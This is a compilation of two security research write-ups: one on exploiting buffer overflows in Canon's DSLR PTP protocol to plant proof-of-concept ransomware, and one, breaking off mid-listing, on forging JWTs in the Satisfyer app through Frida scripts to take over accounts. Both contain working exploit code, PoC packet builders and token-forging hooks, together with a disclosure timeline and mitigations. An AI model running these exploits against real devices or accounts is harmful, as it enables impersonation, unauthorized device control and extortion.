Say Cheese: Ransomware-ing a DSLR Camera

Original text by Eyal Itkin

Cameras. We take them to every important life event, we bring them on our vacations, and we store them in a protective case to keep them safe during transit. Cameras are more than just a tool or toy; we entrust them with our very memories, and so they are very important to us.

In this blog, we recount how we at Check Point Research went on a journey to test if hackers could hit us in this exact sweet spot. We asked: Could hackers take over our cameras, the guardians of our precious moments, and infect them with ransomware?

And the answer is: Yes.

Background: DSLR cameras aren’t your grandparents’ cameras, those enormous antique film contraptions you might find up in the attic. Today’s cameras are embedded digital devices that connect to our computers using USB, and the newest models even support WiFi. While USB and WiFi are used to import our pictures from the camera to our mobile phone or PC, they also expose our camera to its surrounding environment.

Our research shows how an attacker in close proximity (WiFi), or an attacker who has already hijacked our PC (USB), can also propagate to and infect our beloved cameras with malware. Imagine how you would respond if attackers injected ransomware into both your computer and your camera, holding all of your pictures hostage unless you pay a ransom.

Below is a video demonstration of this attack:

Picture Transfer Protocol (PTP)

Modern DSLR cameras no longer use film to capture and later reproduce images. Instead, the International Imaging Industry Association devised a standardised protocol to transfer digital images from your camera to your computer. This protocol is called the Picture Transfer Protocol (PTP). Initially focused on image transfer, this protocol now contains dozens of different commands that support anything from taking a live picture to upgrading the camera’s firmware.

Although most users connect their camera to their PC using a USB cable, newer camera models now support WiFi. This means that what was once a PTP/USB protocol, accessible only to USB-connected devices, is now also PTP/IP, accessible to every WiFi-enabled device in close proximity.

In a previous talk named “Paparazzi over IP” (HITB 2013), Daniel Mende (ERNW) demonstrated all of the different network attacks that are possible for each network protocol that Canon’s EOS cameras supported at the time. At the end of his talk, Daniel discussed the PTP/IP network protocol, showing that an attacker could communicate with the camera by sniffing a specific GUID from the network, a GUID that was generated when the target’s computer got paired with the camera. As the PTP protocol offers a variety of commands, and is not authenticated or encrypted in any way, he demonstrated how he (mis)used the protocol’s functionality for spying over a victim.

In our research we aim to advance beyond the point of accessing and using the protocol’s functionality. Simulating attackers, we want to find implementation vulnerabilities in the protocol, hoping to leverage them in order to take over the camera. Such a Remote Code Execution (RCE) scenario will allow attackers to do whatever they want with the camera, and infecting it with Ransomware is only one of many options.

From an attacker’s perspective, the PTP layer looks like a great target:

  • PTP is an unauthenticated protocol that supports dozens of different complex commands.
  • Vulnerability in PTP can be equally exploited over USB and over WiFi.
  • The WiFi support makes our cameras more accessible to nearby attackers.

In this blog, we focus on the PTP as our attack vector, describing two potential avenues for attackers:

  • USB – For an attacker that took over your PC, and now wants to propagate into your camera.
  • WiFi – An attacker can place a rogue WiFi access point at a tourist attraction, to infect your camera.

In both cases, the attackers are going after your camera. If they’re successful, the chances are you’ll have to pay ransom to free up your beloved camera and picture files.

Introducing our target

We chose to focus on Canon’s EOS 80D DSLR camera for multiple reasons, including:

Magic Lantern (ML) is an open-source free software add-on that adds new features to the Canon EOS cameras. As a result, the ML community already studied parts of the firmware, and documented some of its APIs.

Attackers are profit-maximisers: they strive to get the maximum impact (profit) with minimal effort (cost). In this case, research on Canon cameras will have the highest impact for users, and will be the easiest to start, thanks to the existing documentation created by the ML community.

Obtaining the firmware

This is often the trickiest part of any embedded research. The first step is to check if there is a publicly available firmware update file on the vendor’s website. As expected, we found it after a short Google search. After downloading the file and extracting the archive, we had an unpleasant surprise: the file appears to be encrypted or compressed, as can be seen in Figure 1.

Figure 1 – Byte histogram of the firmware update file.

The even byte distribution hints that the firmware is encrypted or compressed, and that whatever algorithm was used was probably a good one. Skimming through the file, we failed to find any useful pattern that might hint at the presence of the bootloader’s assembly code. In many cases, the bootloader is uncompressed, and it contains the instructions needed to decrypt or decompress the rest of the file.

Trying several decompression tools, such as Binwalk or 7Zip, produced no results, meaning this is either a proprietary compression scheme or an encryption. Encrypted firmware files are quite rare, due to the key-management costs they impose on the vendor.
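A histogram check like the one behind Figure 1 is easy to reproduce. This is a generic sketch (not the tool we used): it flags a file as likely encrypted or well compressed when its byte entropy approaches 8 bits per byte.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; values near 8.0 suggest encryption or strong compression."""
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_encrypted(data: bytes, threshold: float = 7.9) -> bool:
    # Plaintext firmware (code, strings, tables) rarely exceeds ~7 bits/byte.
    return shannon_entropy(data) > threshold
```

Running this over the update file would report an entropy close to 8.0, matching the "even byte distribution" observation above.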

Feeling stuck, we went back to Google, and checked what the internet has to say about this file. Here we can see the major benefit of studying a device with an extensive modding community, as ML also had to work around this limitation. And indeed, in their wiki, we found a page that describes the “update protection” of the firmware update files, as deployed in multiple versions over the years. Unfortunately for us, this confirmed our initial guess: the firmware is AES encrypted.

Since ML is open-source, we hoped they had somehow published this encryption key, allowing us to decrypt the firmware on our own. Unfortunately, that turned out not to be the case. Not only does ML intentionally keep the encryption key secret, we couldn’t even find it anywhere on the internet. Yet another dead end.

The next thing to check was whether ML had ported their software to our camera model, on the chance it contained debugging functionality that would help us dump the firmware. Although such a port has yet to be released, while reading through their forums and wiki we did find a breakthrough: ML developed something called the Portable ROM Dumper, a custom firmware update file that, once loaded, dumps the camera’s memory onto the SD card. Figure 2 shows a picture of the camera during a ROM dump.

Figure 2 – Image taken during a ROM Dump of the EOS 80D.

Using the instructions supplied in the forum, we successfully dumped the camera’s firmware and loaded it into our disassembler (IDA Pro). Now we can finally start looking for vulnerabilities in the camera.

Reversing the PTP layer

Finding the PTP layer was quite easy, due to the combination of two useful resources:

  • The PTP layer is command-based, and every command has a unique numeric opcode.
  • The firmware contains many indicative strings, which eases the task of reverse-engineering it.

Figure 3 – PTP-related string from the firmware.

Traversing back from the PTP handler, we found the main function that registers all of the PTP handlers according to their opcodes. A quick check assured us that the strings in the firmware match the documentation we found online.

When looking at the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them are very high.

PTP Handler API

Each PTP command handler implements the same code API. The API makes use of a context object that is partially documented thanks to ML. Figure 4 shows an example use of this context.

Figure 4 – Decompiled PTP handler, using the context object.

As we can see, the context contains function pointers that are used for:

  • Querying about the size of the incoming message.
  • Receiving the incoming message.
  • Sending back the response after handling the message.

It turns out that most of the commands are relatively simple: they receive only a few numeric arguments, as the protocol supports up to five such arguments per command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer. From an attacker’s viewpoint, we fully control this input buffer, so we can start looking for vulnerabilities in this much smaller set of commands.
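The narrowing step can be illustrated with a toy version of the handler table (a sketch: the five flagged opcodes are the ones named in this post, and the standard GetDeviceInfo command stands in for the roughly 110 commands that take only numeric arguments):

```python
# Hypothetical sketch of the handler-table reconnaissance: each PTP opcode
# maps to a (name, has_input_buffer) pair. Only commands that carry an
# attacker-controlled data phase are interesting targets.
HANDLERS = {
    0x100C: ("SendObjectInfo", True),            # CVE-2019-5994
    0x91F9: ("NotifyBtStatus", True),            # CVE-2019-5998
    0x914C: ("BLERequest", True),                # CVE-2019-5999
    0x91E4: ("SendHostInfo", True),              # CVE-2019-6000
    0x91FD: ("SendAdapterBatteryReport", True),  # CVE-2019-6001
    0x1001: ("GetDeviceInfo", False),            # numeric-args-only example
}

def commands_with_input_buffer(handlers):
    """Keep only the opcodes whose handlers parse an input buffer."""
    return sorted(op for op, (_, has_buf) in handlers.items() if has_buf)
```

In the real firmware the same filtering cut the audit surface from 148 handlers down to 38.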

Luckily for us, the parsing code for each command is plain C and quite straightforward to analyze. Soon enough, we found our first vulnerability.

CVE-2019-5994 – Buffer Overflow in SendObjectInfo – 0x100C

PTP Command Name: SendObjectInfo
PTP Command Opcode: 0x100c

Internally, the protocol refers to supported files and images as “Objects”, and in this command the user updates the metadata of a given object. The handler contains a Buffer Overflow vulnerability when parsing what was supposed to be the Unicode filename of the object. Figure 5 shows a simplified code version of the vulnerable piece of code:

Figure 5 – Vulnerable code snippet from the SendObjectInfo handler.

This is a Buffer Overflow inside a main global context. Without reversing the different fields in this context, the only direct implication we have is the Free-Where primitive located right after our copy: the copy can overwrite a pointer field in the context with an arbitrary value, and a call to free() on that field is triggered later.

This looks like a good way to start our research, but we continued looking for a vulnerability that is easier to exploit.

CVE-2019-5998 – Buffer Overflow in NotifyBtStatus – 0x91F9

PTP Command Name: NotifyBtStatus
PTP Command Opcode: 0x91F9

Even though our camera model doesn’t support Bluetooth, some Bluetooth-related commands were apparently left behind, and are still accessible to attackers. In this case, we found a classic Stack-Based Buffer Overflow, as can be seen in Figure 6.

Figure 6 – Vulnerable code snippet from the NotifyBtStatus handler.

Exploiting this vulnerability will be easy, making it our prime target for exploitation. We would usually stop the code audit at this point, but as we are pretty close to the end of the handler’s list, let’s finish going over the rest.

CVE-2019-5999 – Buffer Overflow in BLERequest – 0x914C

PTP Command Name: BLERequest
PTP Command Opcode: 0x914C

It looks like the Bluetooth commands are more vulnerable than the others, which may suggest a less experienced development team. This time we found a Heap-Based Buffer Overflow, as can be seen in Figure 7.

Figure 7 – Vulnerable code snippet from the BLERequest handler.

We now have 3 similar vulnerabilities:

  • Buffer Overflow over a global structure.
  • Buffer Overflow over the stack.
  • Buffer Overflow over the heap.

As mentioned previously, we will attempt to exploit the Stack-Based vulnerability, which will hopefully be the easiest.

Gaining Code Execution

We started by connecting the camera to our computer using a USB cable. We had previously used the USB interface together with Canon’s “EOS Utility” software, so it seemed natural to attempt exploitation over the USB transport layer first. Searching for a PTP Python library, we found ptpy, which didn’t work straight out of the box, but still saved us important time in our setup.

Before writing a code execution exploit, we started with a small Proof-of-Concept (PoC) that will trigger each of the vulnerabilities we found, hopefully ending in the camera crashing. Figure 8 shows how the camera crashes, in what is described by the vendor as “Err 70.”

Figure 8 – Crash screen we received when we tested our exploit PoCs.
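Such a PoC boils down to sending a command container followed by an oversized data phase. A minimal sketch, assuming the standard PTP-over-USB bulk container layout (u32 length, u16 type, u16 code, u32 transaction ID); the ptpy transport plumbing and the exact payload size are omitted, the 0x400 bytes below are illustrative:

```python
import struct

PTP_CONTAINER_COMMAND = 1
PTP_CONTAINER_DATA = 2

def ptp_container(kind: int, code: int, tid: int, payload: bytes = b"") -> bytes:
    """Build a PTP-over-USB bulk container: length, type, code, transaction ID."""
    return struct.pack("<IHHI", 12 + len(payload), kind, code, tid) + payload

def notify_bt_status_poc(tid: int = 1):
    """Command + oversized data phase for NotifyBtStatus (CVE-2019-5998)."""
    opcode = 0x91F9  # NotifyBtStatus
    command = ptp_container(PTP_CONTAINER_COMMAND, opcode, tid)
    # Oversized data phase, aimed at the fixed-size stack buffer.
    data = ptp_container(PTP_CONTAINER_DATA, opcode, tid, b"A" * 0x400)
    return [command, data]
```

Sending the two containers over the bulk-out endpoint is what eventually produced the Err 70 crash screen.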

Now that we are sure that all of our vulnerabilities indeed work, it’s time to start the real exploit development.

A basic recap of our tools thus far: our camera has no debugger or ML on it. We haven’t opened the camera, meaning we don’t have any hardware-based debugging interface. We don’t know anything about the address space of the firmware, except the code addresses we see in our disassembler. The bottom line is that we are connected to the camera using a USB cable, and we want to blindly exploit a Stack-Based buffer overflow. Let’s get started.

Our plan is to use a sleep function as a breakpoint, and test if we can see the device crash after a given number of seconds. This would confirm that we took over the execution flow and triggered the call to sleep. This all sounds good on paper, but the camera had other plans. Most of the time, the vulnerable task simply died without triggering a crash, thus causing the camera to hang. Needless to say, we can’t differentiate between a hang, and a sleep followed by a hang, making our breakpoint strategy quite pointless.

Originally, we wanted a way to know that the execution flow reached our controlled code. We therefore decided to flip our strategy: we found a code address that always triggers an Err 70 when reached. From now on, our breakpoint will be a call to that address. A crash means we hit our breakpoint; “nothing” (a hang) means we didn’t reach it.

We gradually constructed our exploit until eventually we were able to execute our own assembly snippet – we now have code execution.

Loading Scout

Scout is my go-to debugger. It is an instruction-based debugger that I developed during the FAX research, and it proved itself useful in this research as well. However, we usually use Scout’s basic TCP loader, which requires network connectivity. While we could use a file loader that loads Scout from the SD card, we will later need the same network connectivity for Scout anyway, so we might as well solve this issue now for both.

After playing with the different settings in the camera, we realized that the WiFi can’t be used while the USB is connected, most likely because they are both meant to be used by the PTP layer, and there is no support for using them both at the same time. So we decided the time had come to move on from the USB to WiFi.

We can’t say that switching to the WiFi interface worked out of the box, but eventually we had a Python script that was able to send the same exploit script, this time over the air. Unfortunately, our script broke. After intensive examination, our best guess is that the camera crashes before we return back from the vulnerable function, effectively blocking the Stack-Based vulnerability. While we have no idea why it crashes, it seems that sending a notification about the Bluetooth status, when connecting over WiFi, simply confuses the camera. Especially when it doesn’t even support Bluetooth.

We went back to the drawing-board. We could try to exploit one of the other two vulnerabilities. However, one of them is also in the Bluetooth module, and it doesn’t look promising. Instead, we went over the list of the PTP command handlers again, and this time looked at each one more thoroughly. To our great relief, we found some more vulnerabilities.

CVE-2019-6000 – Buffer Overflow in SendHostInfo – 0x91E4

PTP Command Name: SendHostInfo
PTP Command Opcode: 0x91E4

Looking at the vulnerable code, as seen in Figure 9, it was quite obvious why we missed the vulnerability at first glance.

Figure 9 – Vulnerable code snippet from the SendHostInfo handler.

This time the developers remembered to check that the message is the intended fixed size of 100 bytes. However, they forgot something crucial: illegal packets are only logged, not dropped. After a quick check in our WiFi testing environment, we did see a crash. The logging function isn’t an assert, and it won’t stop our Stack-Based buffer overflow 😊
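Transliterated to Python for clarity, the flawed pattern looks like this (a sketch of the logic, not the firmware’s actual code; in C the oversized copy would smash the stack, whereas here it merely grows the buffer past its intended bound):

```python
BUF_SIZE = 100  # the handler expects a fixed 100-byte message

def parse_host_info_flawed(msg: bytes, buf: bytearray) -> None:
    # The size check only logs; the copy happens regardless.
    if len(msg) != BUF_SIZE:
        print("log: unexpected message size %d" % len(msg))  # logged...
    buf[:len(msg)] = msg  # ...but still copied: overflow when len(msg) > 100

def parse_host_info_fixed(msg: bytes, buf: bytearray) -> None:
    # The fix: reject the packet instead of merely logging.
    if len(msg) != BUF_SIZE:
        raise ValueError("unexpected message size")
    buf[:len(msg)] = msg
```

The difference between logging and rejecting is exactly the difference between a working camera and CVE-2019-6000.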

Although this vulnerability is exactly what we were looking for, we once again decided to keep on looking for more, especially as this kind of vulnerability will most likely be found in more than a single command.

CVE-2019-6001 – Buffer Overflow in SendAdapterBatteryReport – 0x91FD

PTP Command Name: SendAdapterBatteryReport
PTP Command Opcode: 0x91FD

Not only did we find another vulnerability with the same code pattern, this was the last command in the list, giving us a nice finish. Figure 10 shows a simplified version of the vulnerable PTP handler.

Figure 10 – Vulnerable code snippet from the SendAdapterBatteryReport handler.

In this case, the stack buffer is rather small, so we will continue using the previous vulnerability.

Side Note: When testing this vulnerability in the WiFi setup, we found that it also crashes before the function returns. We were only able to exploit it over the USB connection.

Loading Scout – Second Attempt

Armed with our new vulnerability, we finished our exploit and successfully loaded Scout on the camera. We now have a network debugger, and we can start dumping memory addresses to help us during our reverse engineering process.

But, wait a minute, aren’t we done? Our goal was to show that the camera could be hijacked from both USB and WiFi using the Picture Transfer Protocol. While there were minor differences between the two transport layers, in the end the vulnerability we used worked in both cases, thus proving our point. However, taking over the camera was only the first step in the scenario we presented. Now it’s time to create some ransomware.

Time for some Crypto

Any proper ransomware needs cryptographic functions for encrypting the files that are stored on the device. If you recall, the firmware update process mentioned something about AES encryption. This looks like a good opportunity to finish all of our tasks in one go.

This reverse engineering task went much better than we expected: not only did we find the AES functions, we also found the verification and decryption keys for the firmware update process. Because AES is a symmetric cipher, the same keys can also be used to encrypt a malicious firmware update and then sign it so that it passes the verification checks.

Instead of implementing all of the complicated cryptographic algorithms ourselves, we used Scout. We implemented a new instruction that simulates a firmware update process, and sends back the cryptographic signatures that the algorithm calculated. Using this instruction, we now know the correct signatures for each part of the firmware update file, effectively gaining a signing primitive from the camera itself.
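The signing primitive can be modeled like this (a hypothetical sketch: camera_sign() stands in for our custom Scout instruction, and SHA-256 is only a placeholder for the camera’s real, unknown verification algorithm):

```python
import hashlib

def camera_sign(part: bytes) -> bytes:
    # Stand-in for the Scout instruction: in the real attack the camera runs
    # its own firmware-update verification code on `part` and reports back
    # the signature it computed. SHA-256 is purely a placeholder here.
    return hashlib.sha256(part).digest()

def sign_update_parts(parts):
    """Ask the camera 'oracle' for the correct signature of each file part."""
    return [camera_sign(p) for p in parts]
```

The key point is that the attacker never needs to reimplement or even understand the verification scheme: the device computes the correct values on demand.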

Since we only have one camera, this was a tricky part: we wanted to test our own custom home-made firmware update file, but we didn’t want to brick our camera. Luckily for us, Figure 11 shows our customized ROM dumper, created by patching Magic Lantern’s ROM Dumper.

Figure 11 – Image of our customized ROM Dumper, using our header.

CVE-2019-5995 – Silent malicious firmware update:

There is a PTP command for remote firmware update, which requires zero user interaction. This means that even if all of the implementation vulnerabilities are patched, an attacker can still infect the camera using a malicious firmware update file.

Wrapping it up

After playing around with the firmware update process, we went back to finish our ransomware. The ransomware uses the same cryptographic functions as the firmware update process, and calls the same AES functions in the firmware. After encrypting all of the files on the SD Card, the ransomware displays the ransom message to the user.

Chaining everything together requires the attacker to first set up a rogue WiFi access point. This can easily be achieved by sniffing the network and then faking an AP with the same name as the one the camera automatically attempts to connect to. Once the attacker is within the same LAN as the camera, they can initiate the exploit.

Here is a video presentation of our exploit and ransomware.

Disclosure Timeline

  • 31 March 2019 – Vulnerabilities were reported to Canon.
  • 14 May 2019 – Canon confirmed all of our vulnerabilities.
  • From this point onward, both parties worked together to patch the vulnerabilities.
  • 08 July 2019 – We verified and approved Canon’s patch.
  • 06 August 2019 – Canon published the patch as part of an official security advisory.

Canon’s Security Advisory

Here are the links to the official security advisory that was published by Canon:

We strongly recommend that everyone patch their affected cameras.


During our research we found multiple critical vulnerabilities in the Picture Transfer Protocol as implemented by Canon. Although the tested implementation contains many proprietary commands, the protocol is standardized, and is embedded in other cameras. Based on our results, we believe that similar vulnerabilities can be found in the PTP implementations of other vendors as well.

Our research shows that any “smart” device, in our case a DSLR camera, is susceptible to attacks. The combination of price, sensitive contents, and a widespread consumer audience makes cameras a lucrative target for attackers.

A final note about the firmware encryption. Using Magic Lantern’s ROM Dumper, and later using the functions from the firmware itself, we were able to bypass both the encryption and verification. This is a classic example that obscurity does not equal security, especially when it took only a small amount of time to bypass these cryptographic layers.

Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida

Original text by bananamafia

There’s no good way to start a blog post like this, so let’s dive right in:

Recently, I’ve re-discovered the butthax talk which covered security aspects of Lovense devices. I’ve felt so inspired, that I’ve decided to buy some Satisfyer devices and check out how they work.

These are app-controllable toys that are sold globally, first and foremost in Germany and all over the EU. They have some pretty interesting functionality:

  • Control the device via Bluetooth using an Android app. According to the description it’s a sexual joy and wellness app like no other. o_O
  • Create an account, find new friends and exchange messages and images. Given the nature of this app, it’s quite interesting that Google Play allows everyone above 13 to download and use this app. Well OK.
  • Start remote sessions and allow random dudes from the Internet or your friends to control the Satisfyer.
  • Perform software updates.

Throughout this post, I’ll shed some light on how various aspects of some of these features work. Most importantly, I’ve found an authentication bypass vulnerability that can result in an account takeover. This would have allowed me to forge authentication tokens for every user of the application.

Let’s start with some simple things first.

Bluetooth Communication

Communication between an Android device and a Satisfyer is handled via Bluetooth LE. The app implements many controller classes for various tasks, like handling low battery status or controlling the device’s vibration. For example, the ToyHolderController class, like many others, implements a sendBuffer method to send byte buffers to the device. The buffer contents can be logged with the following Frida script:

Java.perform(function() {

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        console.log("[*] sendBuffer(lst<byte>)");
        console.log("Buffer: " + lst.toString());

        // call the original method
        return this.sendBuffer(lst);
    };
});

Which yields:

[*] sendBuffer(lst<byte>)
Buffer: [[33, 33, 33, 33], [25, 25, 25, 25]]

Each list is associated to a specific motor of a Satisfyer. The values in a list control the vibration levels for a specific time frame.

It seems that 100 is the maximum value for the vibration level. As an example of how the communication could be manipulated with Frida, I’ve decided to modify the list of bytes sent to the device to use the value 100:

Java.perform(function() {

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        // create a new byte list containing the value 100 four times
        var byteList = Java.use("java.util.ArrayList").$new();
        var theByte = Java.use("java.lang.Byte").valueOf(100);
        for (var i = 0; i < 4; i++) {
            byteList.add(theByte);
        }

        // replace the buffers for both motors
        lst.set(0, byteList);
        lst.set(1, byteList);

        console.log("[*] sendBuffer(lst<byte>)");
        console.log("Buffer: " + lst.toString());

        // call the original method with the modified parameter
        return this.sendBuffer(lst);
    };
});

This worked and changed the script’s output to:

[*] sendBuffer(lst<byte>)
Buffer: [[100, 100, 100, 100], [100, 100, 100, 100]]

Passing negative values, too long lists or things like that caused the device to ignore these input values.

At this point, other commands sent to the Satisfyer could be altered as well. As can be seen, the easiest way to perform this kind of manipulation is changing values before passing them to the low-level functions of the Bluetooth stack.

Internet Communication

I’ve analyzed the API and authentication flow using decompiled code and Burp. To make this work, I’ve utilized the Universal Android SSL Pinning Bypass script.

JWT Authentication

Each request sent to the server has to be authenticated using a JWT. Interestingly, the client, not the server, is responsible for generating the initial JWT:

public final class JwtTokenBuilder {
    public JwtTokenBuilder() {
    }

    private final native String getReleaseKey();

    public final String createJwtToken() {
        Date date = new Date(new Date().getTime() + (long)86400000);
        Object object = "prod".hashCode() != 3449687 ? this.getDevKey() : this.getReleaseKey();
        Charset charset = d.a;
        if (object != null) {
            object = ((String)object).getBytes(charset);
            l.b(object, "(this as java.lang.String).getBytes(charset)");
            object = Keys.hmacShaKeyFor((byte[])object);
            object = Jwts.builder().setSubject("Satisfyer").claim("auth", "ROLE_ANONYMOUS_CLIENT").signWith((Key)object).setExpiration(date).compact();
            return object;
        }
        return null;
    }
}

As can be seen, createJwtToken() uses a JWT signing key originating from a native library. It then signs and uses JWTs like the following:


After reviewing the authentication flow, I’ve determined that there are (at least) these roles:

  • ROLE_ANONYMOUS_CLIENT is any client that communicates with the Satisfyer API and is not logged in.
  • ROLE_USER is a client that has successfully logged in. Every API request is scoped to information that’s accessible to this specific user account.

An authentication token for a signed in user looks as follows:


While the Android app is responsible for generating the initial JWT with the role ROLE_ANONYMOUS_CLIENT, the server responds with a new JWT after a successful login. This new JWT uses the role ROLE_USER, as can be seen above.

Would it be possible to use the signing key residing in the shared library to sign JWTs not just with ROLE_ANONYMOUS_CLIENT, but also with ROLE_USER? This would allow an attacker to interact with the API in the name of someone else. Let’s find out.
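For reference, the client-side construction performed by createJwtToken() can be replicated with Python’s standard library (a sketch: HS256 is assumed from the Keys.hmacShaKeyFor call, and the key passed in is a placeholder for the one hidden in the native library):

```python
import base64
import hashlib
import hmac
import json
import time

def b64url(data: bytes) -> str:
    """Base64url without padding, as used in JWTs."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def make_client_jwt(key: bytes) -> str:
    # Same shape as createJwtToken(): subject "Satisfyer", anonymous role,
    # 24h expiry, HMAC-SHA256 signature over header.payload.
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {
        "sub": "Satisfyer",
        "auth": "ROLE_ANONYMOUS_CLIENT",
        "exp": int(time.time()) + 86400,
    }
    signing_input = (b64url(json.dumps(header).encode()) + "."
                     + b64url(json.dumps(payload).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)
```

Since the key is shipped inside the app, anyone holding it can just as easily set "auth" to "ROLE_USER", which is the core of the bypass described below.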

Determining the User ID of a Victim

We need two things to forge a JWT for any given account:

  • The account name
  • The user ID of the account

Starting from an account name, determining the user ID is as simple as searching for the account using this API endpoint:

User Search

This can be done by any user with a valid session as ROLE_ANONYMOUS_CLIENT. Please note the value of the user ID in the server’s response.

Creating Forged JWTs with Frida

See, I’m lazy banana man. So instead of dumping the key and creating the JWT myself, I’ve used Frida to instrument the Satisfyer app to do this for me instead.

The app uses a class implementing the JwtBuilder interface to create and sign JWTs. The only class implementing this interface is DefaultJwtBuilder, so I’ve added hooks in there. The plan is as follows:

  • Add a hook to change the auth claim from ROLE_ANONYMOUS_CLIENT to ROLE_USER.
  • Add a hook to add another claim called user_id, indicating the desired user ID of the victim’s account.
  • Change the JWT subject (sub) from Satisfyer (as it’s used for anonymous users) to the account name of the victim.

I came up with this Frida script:

Java.perform(function() {
    var builderClazz = Java.use("io.jsonwebtoken.impl.DefaultJwtBuilder");
    builderClazz.claim.overload("java.lang.String", "java.lang.Object").implementation = function(name, val) {
        console.log("[*] Entered claim()");

        var Integer = Java.use("java.lang.Integer");

        // the user ID of the victim
        var intInstance = Integer.valueOf(282[...]);

        // modify the "auth" claim and add another claim for "user_id"
        var res = this.claim(name, "ROLE_USER").claim("user_id", intInstance);

        return res;
    };

    var claimsClazz = Java.use("io.jsonwebtoken.impl.DefaultClaims");
    claimsClazz.setSubject.overload("java.lang.String").implementation = function(sub) {
        console.log("[*] Entered setSubject()");

        // modify the subject from "Satisfyer" (anonymous user) to the victim's user name
        return this.setSubject("victim[...]");
    };

    // Trigger JWT generation
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    console.log("[*] Got Token:");
    console.log(jwtTokenBuilder.createJwtToken());

    console.log("[+] Hooking complete");
});

This worked just fine and generated a forged JWT when starting the app:

$ python3
[+] Got PID 19213
[*] Entered setSubject()
[*] Entered claim()
[*] Got Token:
[+] Hooking complete

Using the Forged JWT

After creating a JWT for my test account, I’ve simply changed the account’s status message:

Set Status

Checking the status text of the victim revealed that this actually worked 😀

To create this screenshot, I had to use another Frida script to remove the secure flag that is used to block the ability to take screenshots.

Using the API is fine and all, but I wanted to inject the forged token into the running app, so that I could use features like remote control and calls more easily. I came up with a Frida script to generate and add a forged JWT into the app’s local storage. This happens just before the app checks whether a valid JWT already exists using the hasToken() method:
var clazz = Java.use("");
clazz.hasToken.overload().implementation = function() {

    // create new forged token using the hooks described before
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    // createJwtToken() is hooked as well, see above for snippets
    var token = jwtTokenBuilder.createJwtToken();

    // inject the token into shared preferences and add bogus values to make the app happy
    return this.hasToken();
};

The following demo shows the attacker’s phone on the left and the tablet of another dude on the right. Let’s call that dude Antoine.

  1. The attacker is logged in with some random account that’s not relevant for the attack. This account has no friends.
  2. Antoine has a friend in the friends list called victim. In this case, victim refers to the account that is about to be impersonated.
  3. The Frida script is injected into the attacker’s app. It restarts the app and forges a JWT for the victim account. After that, it gets injected into the session storage. At this point, the attacker impersonates the account of victim.
  4. Suddenly, the attacker has a friend in the friends list. This is the account of Antoine, since victim is a friend of his.
  5. The attacker can now message and call Antoine in the name of victim and could control the Satisfyer of Antoine in the name of victim. For this to work, Antoine has to grant access to the caller first, but since he and victim are friends, that should be totally safe, right?

Fear my video editing skillz.

To summarize, the impact of this is quite interesting, since an attacker can now pose as any given user. Next to the ability to send messages as that user, access to the friends list of this compromised account is now possible as well. This means that, in case someone has granted remote dildo access to the compromised account over the Internet, the attacker could now hijack this and control the Satisfyer of another person. After all, the attacker is able to initiate remote sessions as any user.

In the unlikely event that a victim realizes that their account is being impersonated, even changing the password doesn’t help, since the attack doesn’t require knowing the password in the first place.

Note: I’ve only tested and verified this using my own test accounts, I’m not interested in controlling your Satisfyers, sorry.

Possible Mitigation

This issue can be mitigated entirely on the server side, since this is the component responsible for verifying JWT signatures:

  1. Although it’s weird, users that are not logged in could still generate and sign their own JWTs on app startup.
  2. After successful authentication, the server replies with a new JWT that’s valid for the respective user account.
  3. JWTs like this, with roles other than 
    , should be signed and verified with another key that never leaves the server.

This way, no changes to the app should be required. It wouldn’t be possible to forge JWTs anymore, since now two different signing keys are in use for anonymous and authenticated clients.
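A minimal sketch of that rule, with hypothetical key values and role names: any token claiming more than the anonymous role has to verify against a key that never leaves the server.

```python
import base64
import hashlib
import hmac
import json

# hypothetical keys: ANON_KEY may ship inside the app, SERVER_KEY never leaves the server
ANON_KEY = b"key-embedded-in-the-app"
SERVER_KEY = b"key-known-only-to-the-server"

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign(claims: dict, key: bytes) -> str:
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(claims).encode())
    sig = b64url(hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest())
    return f"{header}.{body}.{sig}"

def verify(token: str) -> dict:
    header_b64, body_b64, sig_b64 = token.split(".")
    claims = json.loads(base64.urlsafe_b64decode(body_b64 + "=" * (-len(body_b64) % 4)))
    # the claimed role decides which key the signature must verify against
    key = ANON_KEY if claims.get("role") == "anonymous" else SERVER_KEY
    expected = b64url(hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(expected, sig_b64):
        raise ValueError("bad signature")
    return claims
```

With this split, a token that claims a real user but was signed with the app-embedded key fails verification.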

Dumping the JWT Signing Key

For completeness’ sake, I’ve dumped the JWT signing key using various methods. This key can then be used in external applications to create signed JWTs without relying on Frida and the Android application itself.

The Static Way with radare2

The easiest way is to extract the key statically:

$ r2 -A
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[x] Analyze all flags starting with sym. and entry0 (aa)
[0x000009bc]> afl
0x00000b40    1 20           sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[0x00000a98]> s sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[0x00000b40]> pdf
            ; UNKNOWN XREF from section..dynsym @ +0x98
